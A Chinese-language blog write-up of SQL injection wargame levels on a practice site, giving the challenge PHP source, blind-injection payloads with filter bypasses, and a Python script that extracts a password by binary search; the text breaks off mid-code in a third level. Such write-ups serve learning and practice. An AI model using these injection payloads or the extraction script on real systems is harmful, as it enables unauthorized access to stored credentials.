<!DOCTYPE html>
<html lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.9.0">

    <!--[if lt IE 9]>
        <style>body {display: none; background: none !important} </style>
        <meta http-equiv="Refresh" Content="0; url=//outdatedbrowser.com/" />
    <![endif]-->

<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge, chrome=1">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
<meta name="format-detection" content="telephone=no">
<meta name="author" content="myndtt">



<meta name="description" content="0x00.前言今天在一个网站上做sql注入的题，有几道题，感觉挺有意思的。 一.题目链接: http://los.eagle-jump.org/orc_47190a4d33f675a601f8def32df2583a.php 代码： 123456789101112131415&amp;lt;?php   include &quot;./config.php&quot;;   login_chk();   dbconnect(">
<meta name="keywords" content="记录,audit,sqlid">
<meta property="og:type" content="article">
<meta property="og:title" content="几道sql">
<meta property="og:url" content="https://myndtt.github.io/2017/10/26/几道sqli/index.html">
<meta property="og:site_name" content="myndtt || blog">
<meta property="og:description" content="0x00.前言今天在一个网站上做sql注入的题，有几道题，感觉挺有意思的。 一.题目链接: http://los.eagle-jump.org/orc_47190a4d33f675a601f8def32df2583a.php 代码： 123456789101112131415&amp;lt;?php   include &quot;./config.php&quot;;   login_chk();   dbconnect(">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://myndtt.github.io/images/9.png">
<meta property="og:image" content="https://myndtt.github.io/images/10.png">
<meta property="og:image" content="https://myndtt.github.io/images/11.png">
<meta property="og:image" content="https://myndtt.github.io/images/12.png">
<meta property="og:updated_time" content="2019-09-22T05:30:28.633Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="几道sql">
<meta name="twitter:description" content="0x00.前言今天在一个网站上做sql注入的题，有几道题，感觉挺有意思的。 一.题目链接: http://los.eagle-jump.org/orc_47190a4d33f675a601f8def32df2583a.php 代码： 123456789101112131415&amp;lt;?php   include &quot;./config.php&quot;;   login_chk();   dbconnect(">
<meta name="twitter:image" content="https://myndtt.github.io/images/9.png">

<link rel="apple-touch-icon" href="/apple-touch-icon.png">


    <link rel="alternate" href="/atom.xml" title="myndtt || blog" type="application/atom+xml">



    <link rel="shortcut icon" href="/images/1.jpg">



    <link href="//cdn.bootcss.com/animate.css/3.5.1/animate.min.css" rel="stylesheet">



    <link href="//cdn.bootcss.com/fancybox/2.1.5/jquery.fancybox.min.css" rel="stylesheet">



    <script src="//cdn.bootcss.com/pace/1.0.2/pace.min.js"></script>
    <link href="//cdn.bootcss.com/pace/1.0.2/themes/blue/pace-theme-minimal.css" rel="stylesheet">


<link rel="stylesheet" href="/css/style.css">



<link href="//cdn.bootcss.com/font-awesome/4.6.3/css/font-awesome.min.css" rel="stylesheet">


<title>几道sql | myndtt || blog</title>

<script src="//cdn.bootcss.com/jquery/2.2.4/jquery.min.js"></script>
<script src="//cdn.bootcss.com/clipboard.js/1.5.10/clipboard.min.js"></script>

<script>
    var yiliaConfig = {
        fancybox: true,
        animate: true,
        isHome: false,
        isPost: true,
        isArchive: false,
        isTag: false,
        isCategory: false,
        fancybox_js: "//cdn.bootcss.com/fancybox/2.1.5/jquery.fancybox.min.js",
        scrollreveal: "//cdn.bootcss.com/scrollReveal.js/3.1.4/scrollreveal.min.js",
        search: false
    }
</script>


    <script> yiliaConfig.jquery_ui = [false]; </script>



    <script> yiliaConfig.rootUrl = "\/";</script>






</head></html>
<body>
  <div id="container">
    <div class="left-col">
    <div class="overlay"></div>
<div class="intrude-less">
    <header id="header" class="inner">
        <a href="/" class="profilepic">
            <img src="/images/1.jpg" class="animated zoomIn">
        </a>
        <hgroup>
          <h1 class="header-author"><a href="/">myndtt</a></h1>
        </hgroup>

        
        <p class="header-subtitle">从天堂到彼界 路过人间</p>
        

        


        
            <div id="switch-btn" class="switch-btn">
                <div class="icon">
                    <div class="icon-ctn">
                        <div class="icon-wrap icon-house" data-idx="0">
                            <div class="birdhouse"></div>
                            <div class="birdhouse_holes"></div>
                        </div>
                        <div class="icon-wrap icon-ribbon hide" data-idx="1">
                            <div class="ribbon"></div>
                        </div>
                        
                        <div class="icon-wrap icon-link hide" data-idx="2">
                            <div class="loopback_l"></div>
                            <div class="loopback_r"></div>
                        </div>
                        
                        
                        <div class="icon-wrap icon-me hide" data-idx="3">
                            <div class="user"></div>
                            <div class="shoulder"></div>
                        </div>
                        
                    </div>
                    
                </div>
                <div class="tips-box hide">
                    <div class="tips-arrow"></div>
                    <ul class="tips-inner">
                        <li>菜单</li>
                        <li>标签</li>
                        
                        <li>友情链接</li>
                        
                        
                        <li>关于我</li>
                        
                    </ul>
                </div>
            </div>
        

        <div id="switch-area" class="switch-area">
            <div class="switch-wrap">
                <section class="switch-part switch-part1">
                    <nav class="header-menu">
                        <ul>
                        
                            <li><a href="/">主页</a></li>
                        
                            <li><a href="/archives/">所有文章</a></li>
                        
                            <li><a href="/tags/">标签云</a></li>
                        
                            <li><a href="/about/">关于我</a></li>
                        
                        </ul>
                    </nav>
                    <nav class="header-nav">
                        <ul class="social">
                            
                                <a class="fa Email" href="mailto:admin@myndtt.com" title="Email"></a>
                            
                                <a class="fa GitHub" href="https://github.com/myndtt" title="GitHub"></a>
                            
                                <a class="fa RSS" href="/atom.xml" title="RSS"></a>
                            
                        </ul>
                    </nav>
                </section>
                
                
                <section class="switch-part switch-part2">
                    <div class="widget tagcloud" id="js-tagcloud">
                        <ul class="tag-list"><li class="tag-list-item"><a class="tag-list-link" href="/tags/audit/">audit</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/ctf/">ctf</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/flask/">flask</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/game/">game</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/glance/">glance</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/openstack/">openstack</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/php/">php</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/python/">python</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/scrapy/">scrapy</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/sniperoj/">sniperoj</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/sql/">sql</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/sqli/">sqli</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/sqlid/">sqlid</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/web/">web</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/学习/">学习</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/实验吧/">实验吧</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/点滴/">点滴</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/编程/">编程</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/胡说八道/">胡说八道</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/记录/">记录</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/记录-hadoop/">记录 hadoop</a></li></ul>
                    </div>
                </section>
                
                
                
                <section class="switch-part switch-part3">
                    <div id="js-friends">
                    
                      <a class="main-nav-link switch-friends-link" href="https://www.sec-wiki.com/">sec-wiki</a>
                    
                      <a class="main-nav-link switch-friends-link" href="http://www.myh0st.cn/">myh0st</a>
                    
                      <a class="main-nav-link switch-friends-link" href="https://www.leavesongs.com/">大P神</a>
                    
                      <a class="main-nav-link switch-friends-link" href="http://www.laruence.com/">风神(风雪之隅)</a>
                    
                      <a class="main-nav-link switch-friends-link" href="http://www.yulegeyu.com/">雨师傅</a>
                    
                      <a class="main-nav-link switch-friends-link" href="http://momomoxiaoxi.com/">小西师傅</a>
                    
                      <a class="main-nav-link switch-friends-link" href="https://lorexxar.cn/">LoRexxar</a>
                    
                      <a class="main-nav-link switch-friends-link" href="http://www.yqxiaojunjie.com/">乐清师傅</a>
                    
                      <a class="main-nav-link switch-friends-link" href="http://0x48.pw/">Hcamael</a>
                    
                      <a class="main-nav-link switch-friends-link" href="https://chybeta.github.io/">Chybeta</a>
                    
                      <a class="main-nav-link switch-friends-link" href="http://www.cnblogs.com/lcamry">lcamry</a>
                    
                      <a class="main-nav-link switch-friends-link" href="https://www.lynahex.com/">lynahex</a>
                    
                      <a class="main-nav-link switch-friends-link" href="http://www.cnblogs.com/iamstudy/">柠檬师傅</a>
                    
                    </div>
                </section>
                

                
                
                <section class="switch-part switch-part4">
                
                    <div id="js-aboutme">小菜鸡 奋斗中...</div>
                </section>
                
            </div>
        </div>
    </header>   
   	 <div id="circle"></div>
		<div id="circletext"><strong style="font-size: 12px;"><a>词不达意</a></strong></div>
		<div id="circle1"></div>             
</div>
    </div>
    <div class="mid-col">
      <nav id="mobile-nav">
      <div class="overlay">
          <div class="slider-trigger"></div>
          <h1 class="header-author js-mobile-header hide"><a href="/" title="回到主页">myndtt</a></h1>
      </div>
    <div class="intrude-less">
        <header id="header" class="inner">
            <a href="/" class="profilepic">
                <img src="/images/1.jpg" class="animated zoomIn">
            </a>
            <hgroup>
              <h1 class="header-author"><a href="/" title="回到主页">myndtt</a></h1>
            </hgroup>
            
            <p class="header-subtitle">从天堂到彼界 路过人间</p>
            
            <nav class="header-menu">
                <ul>
                
                    <li><a href="/">主页</a></li>
                
                    <li><a href="/archives/">所有文章</a></li>
                
                    <li><a href="/tags/">标签云</a></li>
                
                    <li><a href="/about/">关于我</a></li>
                
                <div class="clearfix"></div>
                </ul>
            </nav>
            <nav class="header-nav">
                        <ul class="social">
                            
                                <a class="fa Email" target="_blank" href="mailto:admin@myndtt.com" title="Email"></a>
                            
                                <a class="fa GitHub" target="_blank" href="https://github.com/myndtt" title="GitHub"></a>
                            
                                <a class="fa RSS" target="_blank" href="/atom.xml" title="RSS"></a>
                            
                        </ul>
            </nav>
        </header>                
    </div>
    <link class="menu-list" tags="标签" friends="友情链接" about="关于我"/>
</nav>
      <div class="body-wrap"><article id="post-几道sqli" class="article article-type-post" itemscope itemprop="blogPost">
  
    <div class="article-meta">
      <a href="/2017/10/26/几道sqli/" class="article-date">
      <time datetime="2017-10-26T08:21:53.000Z" itemprop="datePublished">2017-10-26</time>
</a>


    </div>
  
  <div class="article-inner">
    
      <input type="hidden" class="isFancy" />
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      几道sql
    </h1>
  

      </header>
      
      <div class="article-info article-info-post">
        

        
    <div class="article-tag tagcloud">
        <ul class="article-tag-list"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/audit/">audit</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/sqlid/">sqlid</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/记录/">记录</a></li></ul>
    </div>

        <div class="clearfix"></div>
      </div>
      
    
    <div class="article-entry" itemprop="articleBody">
      
          
        <h2 id="0x00-前言"><a href="#0x00-前言" class="headerlink" title="0x00.前言"></a>0x00.前言</h2><p>今天在一个网站上做sql注入的题，有几道题，感觉挺有意思的。</p>
<p>一.题目链接: <a href="http://los.eagle-jump.org/orc_47190a4d33f675a601f8def32df2583a.php" target="_blank" rel="noopener">http://los.eagle-jump.org/orc_47190a4d33f675a601f8def32df2583a.php</a></p>
<p>代码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> </span><br><span class="line">  <span class="keyword">include</span> <span class="string">"./config.php"</span>; </span><br><span class="line">  login_chk(); </span><br><span class="line">  dbconnect(); </span><br><span class="line">  <span class="keyword">if</span>(preg_match(<span class="string">'/prob|_|\.|\(\)/i'</span>, $_GET[pw])) <span class="keyword">exit</span>(<span class="string">"No Hack ~_~"</span>); </span><br><span class="line">  $query = <span class="string">"select id from prob_orc where id='admin' and pw='&#123;$_GET[pw]&#125;'"</span>; </span><br><span class="line">  <span class="keyword">echo</span> <span class="string">"&lt;hr&gt;query : &lt;strong&gt;&#123;$query&#125;&lt;/strong&gt;&lt;hr&gt;&lt;br&gt;"</span>; </span><br><span class="line">  $result = @mysql_fetch_array(mysql_query($query)); </span><br><span class="line">  <span class="keyword">if</span>($result[<span class="string">'id'</span>]) <span class="keyword">echo</span> <span class="string">"&lt;h2&gt;Hello admin&lt;/h2&gt;"</span>; </span><br><span class="line">  $_GET[pw] = addslashes($_GET[pw]); </span><br><span class="line">  $query = <span class="string">"select pw from prob_orc where id='admin' and pw='&#123;$_GET[pw]&#125;'"</span>; </span><br><span class="line">  $result = @mysql_fetch_array(mysql_query($query)); </span><br><span class="line">  <span class="keyword">if</span>(($result[<span class="string">'pw'</span>]) &amp;&amp; ($result[<span class="string">'pw'</span>] == $_GET[<span class="string">'pw'</span>])) solve(<span class="string">"orc"</span>); </span><br><span class="line">  highlight_file(<span class="keyword">__FILE__</span>); </span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>这代码够简单的啦，还带回显的。看了看最后，估计是要我们盲注得到pw，这还不简单？写个脚本跑去来，得到pw长度，二分法去提取好了。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">pw=<span class="string">''</span> || length(pw)&gt;<span class="number">0</span></span><br><span class="line">.</span><br><span class="line">.</span><br><span class="line">pw=<span class="string">''</span> || ascii(substr(pw,<span class="number">1</span>,<span class="number">1</span>))&gt;<span class="number">0</span></span><br><span class="line">.</span><br><span class="line">.</span><br></pre></td></tr></table></figure>

<p>对，确实如此，但是实际上我按上面那种方法怎么爆破都不对，甚至怀疑过我的代码，出轨了？</p>
<a id="more"></a>

<h2 id="0x01-渐悟"><a href="#0x01-渐悟" class="headerlink" title="0x01.渐悟"></a>0x01.渐悟</h2><p>想了一会，我才突然发现，我取错行了，这个表应该有好几行，但是我要的admin不在第一行。这就…</p>
<p>接下来目标就是如何取得我要的那一行，并且可以盲注的limit ,order by,desc等等，这里我就用了这一种方式</p>
<p><img src="https://myndtt.github.io/images/9.png" alt="9"></p>
<h2 id="0x02-解决"><a href="#0x02-解决" class="headerlink" title="0x02.解决"></a>0x02.解决</h2><p>但知道重点以后就是改一下代码了</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> urllib</span><br><span class="line"><span class="keyword">import</span> urllib2</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">getlength</span><span class="params">()</span>:</span></span><br><span class="line">    url = <span class="string">'http://los.eagle-jump.org/orc_47190a4d33f675a601f8def32df2583a.php?pw='</span></span><br><span class="line">    s=<span class="number">0</span></span><br><span class="line">    t=<span class="number">30</span></span><br><span class="line">    <span class="keyword">while</span> (s&lt;t):</span><br><span class="line">        <span class="keyword">if</span> (t-s==<span class="number">1</span>):</span><br><span class="line">            <span class="keyword">if</span> doinject(<span class="string">'\'||ascii(id)=97%26%26length(pw)='</span>+str(t)+<span class="string">'%23'</span>):</span><br><span class="line">                m=t</span><br><span class="line">                <span class="keyword">break</span></span><br><span class="line">            <span class="keyword">else</span>:</span><br><span class="line">                m=s</span><br><span class="line">                <span class="keyword">break</span></span><br><span class="line">        m=(s+t)/<span class="number">2</span></span><br><span class="line">        <span class="keyword">if</span> doinject(<span class="string">'\'||ascii(id)=97%26%26length(pw)&gt;'</span>+str(m)+<span class="string">'%23'</span>):</span><br><span class="line">            s=m+<span class="number">1</span></span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            t=m</span><br><span class="line">    <span class="keyword">print</span> <span class="string">'[*]length is %s'</span> % m</span><br><span class="line">    <span class="keyword">return</span> m</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">doinject</span><span class="params">(payload)</span>:</span></span><br><span class="line">    url = <span class="string">'http://los.eagle-jump.org/orc_47190a4d33f675a601f8def32df2583a.php?pw='</span></span><br><span class="line">    <span class="comment">#print payload</span></span><br><span class="line">    url=url+payload</span><br><span class="line">    <span class="comment">#print url</span></span><br><span class="line">    user_agent = <span class="string">'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'</span></span><br><span class="line">    info = &#123; <span class="string">'User-Agent'</span> : user_agent,</span><br><span class="line">                <span class="string">'cookie'</span>:<span class="string">'__cfduid=dad2e2829958f82d5741ad845023671931508994468; PHPSESSID=4jr3sjglvj111r061sif5d2m51'</span></span><br><span class="line">              &#125;</span><br><span class="line">    req = urllib2.Request(str(url),headers=info)</span><br><span class="line">    response = urllib2.urlopen(req)</span><br><span class="line">    the_page = response.read()</span><br><span class="line">    <span class="comment">#print the_page</span></span><br><span class="line">    <span class="keyword">if</span> (the_page.find(<span class="string">"Hello admin"</span>)&gt;<span class="number">1</span>):</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">True</span></span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">False</span></span><br><span class="line">    </span><br><span class="line"><span class="keyword">if</span> __name__==<span class="string">'__main__'</span>:</span><br><span class="line">		a=getlength()+<span class="number">1</span></span><br><span class="line">		res = <span class="string">""</span></span><br><span class="line">		<span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">1</span>,a):</span><br><span class="line">			s=<span class="number">0</span></span><br><span class="line">			t=<span class="number">127</span></span><br><span class="line">			<span class="keyword">while</span> (s&lt;t):</span><br><span class="line">				<span class="keyword">if</span> (t-s==<span class="number">1</span>):</span><br><span class="line">					<span class="keyword">if</span> doinject(<span class="string">'\'||ascii(id)=97%26%26ascii(substr(pw,'</span>+str(i)+<span class="string">',1))='</span>+str(t)+<span class="string">'%23'</span>):<span class="comment">#important </span></span><br><span class="line">						m=t</span><br><span class="line">						<span class="keyword">break</span></span><br><span class="line">					<span class="keyword">else</span>:</span><br><span class="line">						m=s</span><br><span class="line">						<span class="keyword">break</span></span><br><span class="line">				m=(s+t)/<span class="number">2</span></span><br><span class="line">				<span class="keyword">if</span> doinject(<span class="string">'\'||ascii(id)=97%26%26ascii(substr(pw,'</span>+str(i)+<span class="string">',1))&gt;'</span>+str(m)+<span class="string">'%23'</span>):</span><br><span class="line">					s=m+<span class="number">1</span></span><br><span class="line">				<span class="keyword">else</span>:</span><br><span class="line">					t=m</span><br><span class="line">			res = res+chr(m)</span><br><span class="line">			<span class="keyword">print</span> <span class="string">'[*]%s'</span>% res</span><br><span class="line">		<span class="keyword">print</span> <span class="string">'[*] ok ! get it!'</span></span><br></pre></td></tr></table></figure>

<p>这里直接 ||ascii(id)=97就是获取id那一列首字母为a的行,正如你看到的，如果有两行首字母都是a的话，这种方法就不可以，不过但order limit等关键字被过滤时，可以用此方法一试。</p>
<h2 id="0x03-新的风暴"><a href="#0x03-新的风暴" class="headerlink" title="0x03.新的风暴"></a>0x03.新的风暴</h2><p>接着往后面做题目，遇到了这道题。</p>
<p>二。题目链接:<a href="http://los.eagle-jump.org/bugbear_431917ddc1dec75b4d65a23bd39689f8.php" target="_blank" rel="noopener">http://los.eagle-jump.org/bugbear_431917ddc1dec75b4d65a23bd39689f8.php</a></p>
<p>代码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> </span><br><span class="line">  <span class="keyword">include</span> <span class="string">"./config.php"</span>; </span><br><span class="line">  login_chk(); </span><br><span class="line">  dbconnect(); </span><br><span class="line">  <span class="keyword">if</span>(preg_match(<span class="string">'/prob|_|\.|\(\)/i'</span>, $_GET[no])) <span class="keyword">exit</span>(<span class="string">"No Hack ~_~"</span>); </span><br><span class="line">  <span class="keyword">if</span>(preg_match(<span class="string">'/\'/i'</span>, $_GET[pw])) <span class="keyword">exit</span>(<span class="string">"HeHe"</span>); </span><br><span class="line">  <span class="keyword">if</span>(preg_match(<span class="string">'/\'|substr|ascii|=|or|and| |like|0x/i'</span>, $_GET[no])) <span class="keyword">exit</span>(<span class="string">"HeHe"</span>); </span><br><span class="line">  $query = <span class="string">"select id from prob_bugbear where id='guest' and pw='&#123;$_GET[pw]&#125;' and no=&#123;$_GET[no]&#125;"</span>; </span><br><span class="line">  <span class="keyword">echo</span> <span class="string">"&lt;hr&gt;query : &lt;strong&gt;&#123;$query&#125;&lt;/strong&gt;&lt;hr&gt;&lt;br&gt;"</span>; </span><br><span class="line">  $result = @mysql_fetch_array(mysql_query($query)); </span><br><span class="line">  <span class="keyword">if</span>($result[<span class="string">'id'</span>]) <span class="keyword">echo</span> <span class="string">"&lt;h2&gt;Hello &#123;$result[id]&#125;&lt;/h2&gt;"</span>; </span><br><span class="line">   </span><br><span class="line">  $_GET[pw] = addslashes($_GET[pw]); </span><br><span class="line">  $query = <span class="string">"select pw from prob_bugbear where id='admin' and pw='&#123;$_GET[pw]&#125;'"</span>; </span><br><span class="line">  $result = @mysql_fetch_array(mysql_query($query)); </span><br><span class="line">  <span class="keyword">if</span>(($result[<span class="string">'pw'</span>]) &amp;&amp; ($result[<span class="string">'pw'</span>] == $_GET[<span class="string">'pw'</span>])) solve(<span class="string">"bugbear"</span>); </span><br><span class="line">  highlight_file(<span class="keyword">__FILE__</span>); </span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>跟上面那题一样，还是去爆破，关键点在NO上，只是要如何绕过那些个正则，随便搜一下手册，就可以找到很多办法。下面这篇文章就总结了一些：</p>
<p><a href="http://www.cnblogs.com/xiangxiaodong/archive/2011/02/21/1959589.html" target="_blank" rel="noopener">http://www.cnblogs.com/xiangxiaodong/archive/2011/02/21/1959589.html</a></p>
<p>关键在于一个ord(正则了or)不能用，我们要取出字符可以用左右法，left(a,n),right(a,n)。函数功能分别为取出字符串a最左边n个，最右边n个。然后根据前面写下的脚本改一下，重要就是四个判断改变</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">            <span class="keyword">if</span> doinject(<span class="string">'||instr(id,concat(char(97),char(100),char(109),char(105),char(110)))%26%26length(pw)&gt;'</span>+str(m)+<span class="string">'%23'</span>):</span><br><span class="line">----------------------------</span><br><span class="line">        <span class="keyword">if</span> doinject(<span class="string">'||instr(id,concat(char(97),char(100),char(109),char(105),char(110)))%26%26length(pw)&gt;'</span>+str(m)+<span class="string">'%23'</span>):</span><br><span class="line">-----------------------------</span><br><span class="line">					<span class="keyword">if</span> doinject(<span class="string">'||instr(id,concat(char(97),char(100),char(109),char(105),char(110)))%26%26right(left(pw,'</span>+str(i)+<span class="string">'),1)%0ain(char('</span>+str(t)+<span class="string">'))%23'</span>):<span class="comment">#important </span></span><br><span class="line">----------------------------</span><br><span class="line">				<span class="keyword">if</span> doinject(<span class="string">'||instr(id,concat(char(97),char(100),char(109),char(105),char(110)))%26%26right(left(pw,'</span>+str(i)+<span class="string">'),1)&gt;(char('</span>+str(m)+<span class="string">'))%23'</span>):</span><br></pre></td></tr></table></figure>

<p>记住不能有任何偏差。</p>
<h2 id="0x04-暂时"><a href="#0x04-暂时" class="headerlink" title="0x04.暂时"></a>0x04.暂时</h2><p><img src="https://myndtt.github.io/images/10.png" alt="10"></p>
<p>后面一道题脚本有些跑不动了 密码太长了 明天继续…</p>
<h2 id="0x05-阳光穿破黑夜"><a href="#0x05-阳光穿破黑夜" class="headerlink" title="0x05.阳光穿破黑夜"></a>0x05.阳光穿破黑夜</h2><p>继续往后面做，昨天那个密码好长网上搜了一下原来是因为文字原因…也是从此知道原来早就有人写了writeup</p>
<p><a href="http://b.fantazm.net/category/wargame/-los.eagle-jump.org" target="_blank" rel="noopener">http://b.fantazm.net/category/wargame/-los.eagle-jump.org</a> ….</p>
<p>没关系好好看看别人写的也很好。很明显，遍历是没有二分来的高效的啊…… 做到后面题目都感觉差不多了。</p>
<p>题目链接:<a href="http://los.eagle-jump.org/umaru_6f977f0504e56eeb72967f35eadbfdf5.php" target="_blank" rel="noopener">http://los.eagle-jump.org/umaru_6f977f0504e56eeb72967f35eadbfdf5.php</a></p>
<p>代码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">  <span class="keyword">include</span> <span class="string">"./config.php"</span>;</span><br><span class="line">  login_chk();</span><br><span class="line">  dbconnect();</span><br><span class="line"></span><br><span class="line">  <span class="function"><span class="keyword">function</span> <span class="title">reset_flag</span><span class="params">()</span></span>&#123;</span><br><span class="line">    $new_flag = substr(md5(rand(<span class="number">10000000</span>,<span class="number">99999999</span>).<span class="string">"qwer"</span>.rand(<span class="number">10000000</span>,<span class="number">99999999</span>).<span class="string">"asdf"</span>.rand(<span class="number">10000000</span>,<span class="number">99999999</span>)),<span class="number">8</span>,<span class="number">16</span>);</span><br><span class="line">    $chk = @mysql_fetch_array(mysql_query(<span class="string">"select id from prob_umaru where id='&#123;$_SESSION[los_id]&#125;'"</span>));</span><br><span class="line">    <span class="keyword">if</span>(!$chk[id]) mysql_query(<span class="string">"insert into prob_umaru values('&#123;$_SESSION[los_id]&#125;','&#123;$new_flag&#125;')"</span>);</span><br><span class="line">    <span class="keyword">else</span> mysql_query(<span class="string">"update prob_umaru set flag='&#123;$new_flag&#125;' where id='&#123;$_SESSION[los_id]&#125;'"</span>);</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">"reset ok"</span>;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">    <span class="keyword">exit</span>();</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span>(!$_GET[flag])&#123; highlight_file(<span class="keyword">__FILE__</span>); <span class="keyword">exit</span>; &#125;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span>(preg_match(<span class="string">'/prob|_|\./i'</span>, $_GET[flag])) <span class="keyword">exit</span>(<span class="string">"No Hack ~_~"</span>);</span><br><span class="line">  <span class="keyword">if</span>(preg_match(<span class="string">'/id|where|order|limit|,/i'</span>, $_GET[flag])) <span class="keyword">exit</span>(<span class="string">"HeHe"</span>);</span><br><span class="line">  <span class="keyword">if</span>(strlen($_GET[flag])&gt;<span class="number">100</span>) <span class="keyword">exit</span>(<span class="string">"HeHe"</span>);</span><br><span class="line"></span><br><span class="line">  $realflag = @mysql_fetch_array(mysql_query(<span class="string">"select flag from prob_umaru where id='&#123;$_SESSION[los_id]&#125;'"</span>));</span><br><span class="line"></span><br><span class="line">  @mysql_query(<span class="string">"create temporary table prob_umaru_temp as select * from prob_umaru where id='&#123;$_SESSION[los_id]&#125;'"</span>);</span><br><span class="line">  @mysql_query(<span class="string">"update prob_umaru_temp set flag=&#123;$_GET[flag]&#125;"</span>);</span><br><span class="line"></span><br><span class="line">  $tempflag = @mysql_fetch_array(mysql_query(<span class="string">"select flag from 